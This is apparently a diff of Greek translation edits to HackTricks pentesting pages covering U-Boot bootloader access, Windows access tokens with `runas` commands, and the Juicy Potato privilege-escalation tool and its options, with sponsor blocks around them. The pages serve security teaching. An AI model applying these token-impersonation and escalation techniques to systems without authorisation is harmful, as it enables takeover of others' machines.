Παρόλο που είναι απαραίτητο να σημειωθεί ότι δεν είναι πάντα το σενάριο ότι το <b>uboot</b> είναι ξεκλείδωτο ακόμα κι αν χρησιμοποιείται. Αν το πλήκτρο Enter δεν κάνει τίποτα, ελέγξτε για διαφορετικά πλήκτρα όπως το Space Key, κλπ. Αν ο φορτιστής είναι κλειδωμένος και δεν διακόπτεται, αυτή η μέθοδος δεν θα λειτουργήσει. Για να ελέγξετε αν το <b>uboot</b> είναι ο φορτιστής για τη συσκευή, ελέγξτε την έξοδο στην κονσόλα UART κατά την εκκίνηση της συσκευής. Μπορεί να αναφέρει το <b>uboot</b> κατά την εκκίνηση.
|
||||
Παρόλο που είναι απαραίτητο να σημειωθεί ότι δεν είναι πάντα η περίπτωση ότι το <b>uboot</b> είναι ξεκλείδωτο ακόμα κι αν χρησιμοποιείται. Αν το πλήκτρο Enter δεν κάνει τίποτα, ελέγξτε για διαφορετικά πλήκτρα όπως το Space Key, κλπ. Αν ο bootloader είναι κλειδωμένος και δεν διακόπτεται, αυτή η μέθοδος δεν θα λειτουργήσει. Για να ελέγξετε αν το <b>uboot</b> είναι ο bootloader για τη συσκευή, ελέγξτε την έξοδο στην κονσόλα UART κατά την εκκίνηση της συσκευής. Μπορεί να αναφέρει το <b>uboot</b> κατά την εκκίνηση.
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -201,10 +201,10 @@ binwalk -e <filename.rom>
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF, ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας χάρη στην υποβολή PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,25 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks στο AWS)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε την [**Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Εγγραφείτε στη** [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Εγγραφείτε στη** [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -80,46 +80,44 @@ SeTimeZonePrivilege Change the time zone Disabled
|
|||
|
||||
### Τοπικός διαχειριστής
|
||||
|
||||
Όταν ένας τοπικός διαχειριστής συνδεθεί, **δημιουργούνται δύο διαθέσιμα διαπιστευτήρια**: Ένα με δικαιώματα διαχειριστή και ένα με κανονικά δικαιώματα. **Από προεπιλογή**, όταν αυτός ο χρήστης εκτελεί μια διαδικασία χρησιμοποιείται το ένα με **κανονικά** (μη διαχειριστή) **δικαιώματα**. Όταν αυτός ο χρήστης προσπαθεί να **εκτελέσει** οτιδήποτε **ως διαχειριστής** ("Εκτέλεση ως Διαχειριστής" για παράδειγμα) το **UAC** θα χρησιμοποιηθεί για να ζητήσει άδεια.\
|
||||
Όταν ένας τοπικός διαχειριστής συνδεθεί, **δημιουργούνται δύο διαθέσιμα διακριτικά**: Ένα με δικαιώματα διαχειριστή και ένα με κανονικά δικαιώματα. **Από προεπιλογή**, όταν αυτός ο χρήστης εκτελεί μια διαδικασία χρησιμοποιείται το διακριτικό με **κανονικά** (μη διαχειριστή) **δικαιώματα**. Όταν αυτός ο χρήστης προσπαθεί να **εκτελέσει** οτιδήποτε **ως διαχειριστής** ("Εκτέλεση ως Διαχειριστής" για παράδειγμα) το **UAC** θα χρησιμοποιηθεί για να ζητήσει άδεια.\
|
||||
Αν θέλετε να [**μάθετε περισσότερα για το UAC διαβάστε αυτήν τη σελίδα**](../authentication-credentials-uac-and-efs/#uac)**.**
|
||||
|
||||
### Παρασύρεση χρήστη διαπιστευτηριακών στοιχείων
|
||||
### Παρασύρση χρήστη διαπιστεύσεων
|
||||
|
||||
Αν έχετε **έγκυρα διαπιστευτήρια οποιουδήποτε άλλου χρήστη**, μπορείτε να **δημιουργήσετε** μια **νέα συνεδρία σύνδεσης** με αυτά τα διαπιστευτήρια:
|
||||
Αν έχετε **έγκυρες διαπιστεύσεις οποιουδήποτε άλλου χρήστη**, μπορείτε να **δημιουργήσετε** μια **νέα συνεδρία σύνδεσης** με αυτές τις διαπιστεύσεις:
|
||||
```
|
||||
runas /user:domain\username cmd.exe
|
||||
```
|
||||
Το **access token** έχει επίσης μια **αναφορά** των συνεδριών σύνδεσης μέσα στο **LSASS**, αυτό είναι χρήσιμο αν η διαδικασία χρειάζεται πρόσβαση σε κάποια αντικείμενα του δικτύου.\
|
||||
Μπορείτε να εκκινήσετε μια διαδικασία που **χρησιμοποιεί διαφορετικές διαπιστευτήριες για την πρόσβαση σε υπηρεσίες δικτύου** χρησιμοποιώντας:
|
||||
Μπορείτε να εκκινήσετε μια διαδικασία που **χρησιμοποιεί διαφορετικές διαπιστεύσεις για την πρόσβαση σε υπηρεσίες δικτύου** χρησιμοποιώντας:
|
||||
```
|
||||
runas /user:domain\username /netonly cmd.exe
|
||||
```
|
||||
Αυτό είναι χρήσιμο εάν έχετε διαπιστευτήρια πρόσβασης σε αντικείμενα στο δίκτυο, αλλά αυτά τα διαπιστευτήρια δεν είναι έγκυρα μέσα στο τρέχον σύστημα, καθώς θα χρησιμοποιηθούν μόνο στο δίκτυο (στο τρέχον σύστημα θα χρησιμοποιηθούν οι τρέχουσες δικαιώματα χρήστη).
|
||||
|
||||
### Τύποι διακριτικών
|
||||
|
||||
Υπάρχουν δύο τύποι διακριτικών διαθέσιμοι:
|
||||
Υπάρχουν δύο τύποι διακριτικών διαθέσιμα:
|
||||
|
||||
* **Κύριο Διακριτικό**: Λειτουργεί ως αναπαράσταση των διαπιστευτηρίων ασφαλείας ενός διεργασίας. Η δημιουργία και η συσχέτιση των κύριων διακριτικών με διεργασίες είναι ενέργειες που απαιτούν αυξημένα δικαιώματα, υπογραμμίζοντας την αρχή του διαχωρισμού δικαιωμάτων. Συνήθως, ένα υπηρεσίας πιστοποίησης είναι υπεύθυνο για τη δημιουργία διακριτικών, ενώ μια υπηρεσία σύνδεσης χειρίζεται τη συσχέτισή τους με το κέλυφος λειτουργικού συστήματος του χρήστη. Αξίζει να σημειωθεί ότι οι διεργασίες κληρονομούν το κύριο διακριτικό της γονικής διεργασίας τους κατά τη δημιουργία.
|
||||
* **Διακριτικό Προσωποποίησης**: Δίνει σε μια εφαρμογή εξυπηρετητή τη δυνατότητα να υιοθετήσει προσωρινά την ταυτότητα του πελάτη για πρόσβαση σε ασφαλή αντικείμενα. Αυτός ο μηχανισμός είναι στρωμένος σε τέσσερα επίπεδα λειτουργίας:
|
||||
* **Ανώνυμο**: Χορηγεί πρόσβαση στον εξυπηρετητή παρόμοια με αυτήν ενός μη αναγνωρισμένου χρήστη.
|
||||
* **Ταυτοποίηση**: Επιτρέπει στον εξυπηρετητή να επαληθεύσει την ταυτότητα του πελάτη χωρίς να τη χρησιμοποιεί για πρόσβαση σε αντικείμενα.
|
||||
* **Προσωποποίηση**: Επιτρέπει στον εξυπηρετητή να λειτουργεί υπό την ταυτότητα του πελάτη.
|
||||
* **Αναθέσεις**: Παρόμοιο με την Προσωποποίηση, αλλά περιλαμβάνει τη δυνατότητα επέκτασης αυτής της υπόθεσης ταυτότητας σε απομακρυσμένα συστήματα με τα οποία αλληλεπιδρά ο εξυπηρετητής, εξασφαλίζοντας τη διατήρηση των διαπιστευτηρίων.
|
||||
- **Κύριο Διακριτικό**: Λειτουργεί ως αναπαράσταση των διαπιστευτηρίων ασφαλείας ενός διεργασίας. Η δημιουργία και συσχέτιση των κύριων διακριτικών με διεργασίες είναι ενέργειες που απαιτούν αυξημένα προνόμια, υπογραμμίζοντας την αρχή του διαχωρισμού προνομίων. Συνήθως, ένα υπηρεσία πιστοποίησης είναι υπεύθυνο για τη δημιουργία διακριτικών, ενώ μια υπηρεσία σύνδεσης χειρίζεται τη συσχέτισή τους με το κέλυφος λειτουργικού συστήματος του χρήστη. Αξίζει να σημειωθεί ότι οι διεργασίες κληρονομούν το κύριο διακριτικό της γονικής τους διεργασίας κατά τη δημιουργία τους.
|
||||
- **Διακριτικό Προσωποποίησης**: Δίνει σε μια εφαρμογή εξυπηρετητή τη δυνατότητα να υιοθετήσει προσωρινά την ταυτότητα του πελάτη για πρόσβαση σε ασφαλή αντικείμενα. Αυτός ο μηχανισμός είναι στρωμένος σε τέσσερα επίπεδα λειτουργίας:
|
||||
- **Ανώνυμο**: Χορηγεί πρόσβαση στον εξυπηρητή παρόμοια με αυτήν ενός μη αναγνωρισμένου χρήστη.
|
||||
- **Ταυτοποίηση**: Επιτρέπει στον εξυπηρητή να επαληθεύσει την ταυτότητα του πελάτη χωρίς να τη χρησιμοποιεί για πρόσβαση σε αντικείμενα.
|
||||
- **Προσωποποίηση**: Επιτρέπει στον εξυπηρητή να λειτουργεί υπό την ταυτότητα του πελάτη.
|
||||
- **Αναθέσεις**: Παρόμοιο με την Προσωποποίηση, αλλά περιλαμβάνει τη δυνατότητα επέκτασης αυτής της υπόθεσης ταυτότητας σε απομακρυσμένα συστήματα με τα οποία αλληλεπιδρά ο εξυπηρητής, εξασφαλίζοντας τη διατήρηση των διαπιστευτηρίων.
|
||||
|
||||
#### Προσωποποίηση Διακριτικών
|
||||
|
||||
Χρησιμοποιώντας το _**module incognito**_ του metasploit, εάν έχετε αρκετά δικαιώματα, μπορείτε εύκολα να **καταλογογραφήσετε** και **προσωποποιήσετε** άλλα **διακριτικά**. Αυτό θα μπορούσε να είναι χρήσιμο για να εκτελέσετε **ενέργειες ως αν υπήρχετε ο άλλος χρήστης**. Μπορείτε επίσης να **αναβαθμίσετε τα δικαιώματα** με αυτήν την τεχνική.
|
||||
Χρησιμοποιώντας το **module incognito** του metasploit, αν έχετε αρκετά προνόμια, μπορείτε εύκολα να **καταλογογραφήσετε** και **προσωποποιήσετε** άλλα **διακριτικά**. Αυτό μπορεί να είναι χρήσιμο για να εκτελέσετε **ενέργειες ως να ήσασταν ο άλλος χρήστης**. Μπορείτε επίσης να **αναβαθμίσετε προνόμια** με αυτήν την τεχνική.
|
||||
|
||||
### Δικαιώματα Διακριτικών
|
||||
### Προνόμια Διακριτικών
|
||||
|
||||
Μάθετε ποια **δικαιώματα διακριτικών μπορούν να καταχραστούν για την ανάδειξη δικαιωμάτων:**
|
||||
Μάθετε ποια **προνόμια διακριτικών μπορούν να καταχραστούν για την ανάδειξη προνομίων:**
|
||||
|
||||
{% content-ref url="privilege-escalation-abusing-tokens.md" %}
|
||||
[privilege-escalation-abusing-tokens.md](privilege-escalation-abusing-tokens.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Ρίξτε μια ματιά σε [**όλα τα δυνατά δικαιώματα διακριτικών και μερικούς ορισμούς σε αυτήν την εξωτερική σελίδα**](https://github.com/gtworek/Priv2Admin).
|
||||
Ρίξτε μια ματιά σε [**όλα τα πιθανά προνόμια διακριτικών και μερικούς ορισμούς σε αυτήν την εξωτερική σελίδα**](https://github.com/gtworek/Priv2Admin).
|
||||
|
||||
## Αναφορές
|
||||
|
||||
|
|
|
@ -4,21 +4,21 @@
|
|||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε τη [**Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Εγγραφείτε** στη [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Εγγραφείτε** στη [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**αποθετήρια hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι να καταπολεμήσει τις απαγωγές λογαριασμών και τις επιθέσεις με αντάλλαγμα λύτρων που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -36,7 +36,7 @@
|
|||
|
||||
## Juicy Potato (κατάχρηση των χρυσών προνομίων) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
|
||||
|
||||
_Μια γλυκιά εκδοχή του_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, με λίγο χυμό, δηλαδή **ένα εργαλείο Ανόδου Προνομίων Τοπικού Επίπεδου, από Λογαριασμούς Υπηρεσίας Windows σε NT AUTHORITY\SYSTEM**_
|
||||
_Μια γλυκιά εκδοχή του_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, με λίγο χυμό, δηλαδή **ένα εργαλείο Ανόδου Προνομίων Τοπικού Συστήματος, από Λογαριασμούς Υπηρεσίας Windows σε NT AUTHORITY\SYSTEM**_
|
||||
|
||||
#### Μπορείτε να κατεβάσετε το juicypotato από [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
|
||||
|
||||
|
@ -44,17 +44,17 @@ _Μια γλυκιά εκδοχή του_ [_RottenPotatoNG_](https://github.com/
|
|||
|
||||
[**Από το Readme του juicy-potato**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
|
||||
|
||||
Το [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) και οι [παραλλαγές του](https://github.com/decoder-it/lonelypotato) εκμεταλλεύονται την αλυσίδα ανόδου προνομίων βασισμένη στην υπηρεσία [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) έχοντας τον ακροατή MiTM στο `127.0.0.1:6666` και όταν έχετε προνόμια `SeImpersonate` ή `SeAssignPrimaryToken`. Κατά την αναθεώρηση μιας εγκατάστασης Windows, βρήκαμε μια ρύθμιση όπου το `BITS` ήταν εσκεμμένα απενεργοποιημένο και η θύρα `6666` ήταν κατειλημμένη.
|
||||
Το [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) και οι [παραλλαγές του](https://github.com/decoder-it/lonelypotato) εκμεταλλεύονται την αλυσίδα ανόδου προνομίων βασισμένη στην υπηρεσία [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) με τον ακροατή MiTM στο `127.0.0.1:6666` και όταν έχετε προνόμια `SeImpersonate` ή `SeAssignPrimaryToken`. Κατά την αναθεώρηση ενός Windows build, βρήκαμε μια ρύθμιση όπου το `BITS` ήταν εσκεμμένα απενεργοποιημένο και η θύρα `6666` ήταν κατειλημμένη.
|
||||
|
||||
Αποφασίσαμε να όπλισουμε το [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Πείτε γεια στο Juicy Potato**.
|
||||
|
||||
> Για τη θεωρία, δείτε το [Rotten Potato - Ανόδου Προνομίων από Λογαριασμούς Υπηρεσίας σε SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) και ακολουθήστε την αλυσίδα των συνδέσμων και αναφορών.
|
||||
> Για τη θεωρία, δείτε το [Rotten Potato - Ανόδος Προνομίων από Λογαριασμούς Υπηρεσίας σε SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) και ακολουθήστε τη σειρά των συνδέσμων και αναφορών.
|
||||
|
||||
Ανακαλύψαμε ότι, εκτός από το `BITS`, υπάρχουν αρκετοί COM servers που μπορούμε να καταχρηστικοποιήσουμε. Απλώς πρέπει:
|
||||
|
||||
1. να είναι δυνατή η δημιουργία από τον τρέχοντα χρήστη, συνήθως ένας "χρήστης υπηρεσίας" που έχει προνόμια υποκατάστασης
|
||||
2. να υλοποιούν τη διεπαφή `IMarshal`
|
||||
3. να τρέχουν ως χρήστης με αυξημένα προνόμια (SYSTEM, Διαχειριστής, ...)
|
||||
3. να τρέχουν ως χρήστης με υψηλά προνόμια (SYSTEM, Διαχειριστής, ...)
|
||||
|
||||
Μετά από μερικές δοκιμές, αποκτήσαμε και δοκιμάσαμε μια εκτεταμένη λίστα [ενδιαφέροντων CLSID's](http://ohpe.it/juicy-potato/CLSID/) σε διάφορες εκδόσεις των Windows.
|
||||
|
||||
|
@ -63,16 +63,16 @@ _Μια γλυκιά εκδοχή του_ [_RottenPotatoNG_](https://github.com/
|
|||
Το JuicyPotato σάς επιτρέπει να:
|
||||
|
||||
* **Στόχος CLSID** _επιλέξτε οποιοδήποτε CLSID θέλετε._ [_Εδώ_](http://ohpe.it/juicy-potato/CLSID/) _μπορείτε να βρείτε τη λίστα οργανωμένη ανά λειτουργικό σύστημα._
|
||||
* **Πόρτα Ακρόασης COM** _ορίστε την πόρτα ακρόασης COM που προτιμάτε (αντί για την σκληροκωδικοποιημένη 6666)_
|
||||
* **Διεύθυνση IP Ακρόασης COM** _δέστε τον εξυπηρετητή σε οποιαδήποτε IP_
|
||||
* **Λειτουργία Δημιουργίας Διεργασίας** _ανάλογα με τα προνόμια υποκατάστασης του χρήστη μπορείτε να επιλέξετε από:_
|
||||
* **Πόρτα COM ακρόασης** _ορίστε την πόρτα COM ακρόασης που προτιμάτε (αντί για το marshalled hardcoded 6666)_
|
||||
* **Διεύθυνση IP ακρόασης COM** _δέστε τον εξυπηρετητή σε οποιαδήποτε IP_
|
||||
* **Λειτουργία δημιουργίας διεργασίας** _ανάλογα με τα προνόμια υποκατάστασης του χρήστη, μπορείτε να επιλέξετε από:_
|
||||
* `CreateProcessWithToken` (χρειάζεται `SeImpersonate`)
|
||||
* `CreateProcessAsUser` (χρειάζεται `SeAssignPrimaryToken`)
|
||||
* `και τα δύο`
|
||||
* **Διεργασία για εκκίνηση** _εκκινήστε ένα εκτελέσιμο ή σενάριο αν η εκμετάλλευση επιτύχει_
|
||||
* **Παράμετρος Διεργασίας** _προσαρμόστε τις παραμέτρους της διεργασίας που εκκινείται_
|
||||
* **Διεύθυνση Διακομιστή RPC** _για μια αθόρυβη προσέγγιση μπορείτε να πιστοποιηθείτε σε έναν εξωτερικό διακομιστή RPC_
|
||||
* **Πόρτα Διακομιστή RPC** _χρήσιμο αν θέλετε να πιστοποιηθείτε σε έναν εξωτερικό διακομιστή και το τείχος πυρασφάλειας αποκλείει τη θύρα `135`..._
|
||||
* **Παράμετρος διεργασίας** _προσαρμόστε τις παραμέτρους της εκκινούμενης διεργασίας_
|
||||
* **Διεύθυνση RPC Server** _για μια αθόρυβη προσέγγιση μπορείτε να πιστοποιηθείτε σε έναν εξωτερικό διακομιστή RPC_
|
||||
* **Πόρτα RPC Server** _χρήσιμο αν θέλετε να πιστοποιηθείτε σε έναν εξωτερικό διακομιστή και το τείχος πυρασφάλειας αποκλείει τη θύρα `135`..._
|
||||
* **Λειτουργία ΔΟΚΙΜΗΣ** _κυρίως για δοκιμαστικούς σκοπούς, δηλαδή δοκιμή CLSIDs. Δημιουργεί το DCOM και εκτυπώνει τον χρήστη του τοκέν. Δείτε_ [_εδώ για δοκιμή_](http://ohpe.it/juicy-potato/Test/)
|
||||
### Χρήση <a href="#usage" id="usage"></a>
|
||||
```
|
||||
|
@ -95,11 +95,11 @@ Optional args:
|
|||
|
||||
[**Από το Readme του juicy-potato**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
|
||||
|
||||
Αν ο χρήστης έχει δικαιώματα `SeImpersonate` ή `SeAssignPrimaryToken` τότε είστε **SYSTEM**.
|
||||
Αν ο χρήστης έχει προνόμια `SeImpersonate` ή `SeAssignPrimaryToken` τότε είστε **SYSTEM**.
|
||||
|
||||
Είναι σχεδόν αδύνατο να αποτρέψετε την κατάχρηση όλων αυτών των COM Servers. Μπορείτε να σκεφτείτε να τροποποιήσετε τα δικαιώματα αυτών των αντικειμένων μέσω του `DCOMCNFG` αλλά καλή τύχη, αυτό θα είναι πρόκληση.
|
||||
|
||||
Η πραγματική λύση είναι να προστατεύσετε ευαίσθητους λογαριασμούς και εφαρμογές που εκτελούνται υπό τους λογαριασμούς `* SERVICE`. Η διακοπή του `DCOM` θα αναστείλει σίγουρα αυτήν την εκμετάλλευση αλλά θα μπορούσε να έχει σοβαρές επιπτώσεις στο υποκείμενο λειτουργικό σύστημα.
|
||||
Η πραγματική λύση είναι να προστατεύσετε ευαίσθητους λογαριασμούς και εφαρμογές που εκτελούνται υπό τους λογαριασμούς `* SERVICE`. Η διακοπή του `DCOM` θα εμπόδιζε σίγουρα αυτήν την εκμετάλλευση αλλά θα μπορούσε να έχει σοβαρές επιπτώσεις στο υποκείμενο λειτουργικό σύστημα.
|
||||
|
||||
